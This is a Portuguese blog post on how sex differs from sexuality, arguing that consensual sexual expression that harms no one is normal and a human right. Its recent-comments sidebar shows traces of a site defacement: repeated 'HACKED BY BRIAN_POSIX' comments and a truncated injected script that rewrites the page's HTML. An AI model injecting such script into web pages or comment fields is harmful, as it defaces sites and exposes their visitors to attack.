Ousar Ser @ 18:33

Qui, 22/03/12

Sexo e sexualidade não se reportam à mesma coisa. Podemos dizer que a sexualidade é o conjunto das experiências emocionais da atmosfera afetiva em que, a partir da puberdade o ato sexual poderá vir a enquadrar-se. Em muitas línguas o ato sexual é designado por “fazer amor” o que significa que o ato sexual dos humanos se pode acompanhar de emoções de ternura e carinho que serão uma das melhores vivências que uma pessoa pode conhecer.

A atividade sexual humana é nisso distinta da atividade sexual animal que é ela puramente instintiva. Se o amor e a emoção pode assim melhorar e marcar a diferença na sexualidade humana isto não quer dizer que o ato sexual praticado sem estes ingredientes seja anormal, patológico perverso.

Praticar sexo seja da forma que for com quem for e enquadrado no ambiente que for, é um DIREITO HUMANO: neste campo é hipocrisia e patologia sim, a crítica social constante numa espécie de tentação a definir A PESSOA por aquilo que faz com os seus órgãos genitais.

É importante sair desta atitude onde tantas vezes usamos o que chamamos VALORES como JULGAMENTOS, alienando o nosso ser e podendo agredir e prejudicar o “julgado”.

Em matéria de sexo/sexualidade só parecemos parecidos porque na realidade somos todos únicos. Só há patologia ou crime quando alguma forma de expressão sexual faça sofrer o próprio ou o próximo.

Muitos ou poucos ou nenhuns, ou muitas ou poucas ou nenhumas, se não fizer mal a ninguém é uma atividade positiva e “normal” seja para eles como para elas.



Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO